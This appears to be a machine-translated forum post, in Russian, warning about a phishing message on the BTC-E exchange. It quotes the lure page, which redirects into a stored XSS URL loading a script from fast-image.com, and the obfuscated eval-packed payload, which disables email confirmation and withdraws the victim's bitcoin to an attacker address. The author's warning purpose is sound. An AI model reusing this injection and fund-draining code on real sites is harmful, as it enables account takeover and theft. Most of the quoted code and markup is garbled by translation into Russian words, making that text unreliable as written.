Сегодня я получил личное сообщение на BTC-E. Это первая странная вещь, так как я никогда не использовать trollbox или использовать систему ПМ там.
Он содержит ссылку на hxxp:. // быстро изображение (dontclickthisshit) ком / guh8ydyxz / bitcoin_chart15493.jpg, который не является изображением, но файл HTML.
котировка
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
http://www.w3.org/1999/xhtml" Ланг ="ан" XML: LANG ="ан">
<глава>
глава>
<тело>
<сценарий языка ="JavaScript">
document.location ="https://btc-e.com/news/32?page=1<Сценарий + SRC = HTTP: //fast-image.com/q.js><\ / Скрипт>";
скрипт>
тело>
html>
http://www.w3.org/1999/xhtml" Ланг ="ан" XML: LANG ="ан">
<глава>
глава>
<тело>
<сценарий языка ="JavaScript">
document.location ="https://btc-e.com/news/32?page=1<Сценарий + SRC = HTTP: //fast-image.com/q.js><\ / Скрипт>";
скрипт>
тело>
html>
Это загружает скрипт, который, кажется, использовать уязвимость XSS на BTC-E.
котировка
Eval ((функция (х) {вар д =""; Вар р = 0, тогда как (р4) D + = d.substr (D.Length-x.charCodeAt (р + 1) * 96-x.charCodeAt (р + 2) + 3104-L, L), иначе D + ="`"; Р + = 4}}} возвращение д) ("вар wallet_btc = \"1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo \"; `K'l` P \"LSQBL4Rs1rjP3tZUVb4MfXSQu1JEyWr7ix` P \"REDIR = \"http://fast-image.com/guh8ydjxz/bitcoin_chart15483.jpg`_ \"XMLHTTP = false` /! btc_amount` *! lt` \") Token`% с;! Попробуйте { `[&новый XMLHttpRequest;} поймать (е) { ` ActiveXObject (\"Msxml2.XMLHTTP \") `/ Microsoft` K4document.location =` # E \";!!!!}}} Func` / PostData (страницы, данные, step` = $, если ( `B #)` J% .Open (\"ПОСЛЕ\"`U \"истинно), если (шаг == 1 'Е (nreadystatechange = Handler1;} еще `Q (2` 6C2` I03` 6C3` I04` 6C4` I05` 6C5` U $` $, 8` за $ set`&? #header (\"Тип содержимого\"\"appli` Y \"/ Х-WWW-форм-urlencoded \") `T6X-` * # эд-С \"\"` 'P *` R) й (данные) `! _ @`&JE`&я% `% М $ (evtXHR)`&V) .` # M State` $ C $ `2 (status`% г 00) {return`!} # 1 (` LB`: -!!! 2` Zm2` sT3` g`` * K% \"../ Аякса / profile.php \"\"задача = фонды \", 4`! 4S4` \"Em4` \"^ T5`! # D`&\\ A`&%, { '1' \"sponse = `1 $$.` + $ Tex`0m \"ДИВ = `|% createElement (\"DIV \"); Div.innerHTML`:! `_ \"`4! Style.display = \"никто\"; `Я% body.appendChild (дела);!!` `2% - (get` / # ById (\"` ! `-.! !. length`, 2) {` 3&& = Math.floor (parseFloat ( `р / sByClassName (\"money_btc \") [0] `\"@&) `0U \"`Х»> 5`%>! `)) 500;!}`&zBedit% 2Fhome \", 2`% UB` $ o22` $ # ~ `$ D] sec` $ g8s_email \"`#a \"! Sec.checked` * \\ 1coins` # G $ акт = отзывать&сумма = \" + `$ '+ \"&address` 6! wallet_btc` 6! coin_id = 1&`&1! ` >! `% !, 3` # ZX4` # jHl` е% _rgx` # h'.match (/ Баланс: \\<б класс = «красный» \\>([0-9] +.? `#! *) \\<\\ / б \\> LTC /); `о& = `W + .slice (1 '6 +` (D2` 9&`($ #` Я> 300` (( `\\)` 0;!} `$ * C` p'` $ Z3l` $ Ь + 8` $ _ 5` $ KB` N.billing` N0_coin% 2F1 \.!", 1);"))
Согласно Blockexplorer, значительные объемы BTC уже были украдены:
http://blockexplorer.com/address/1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo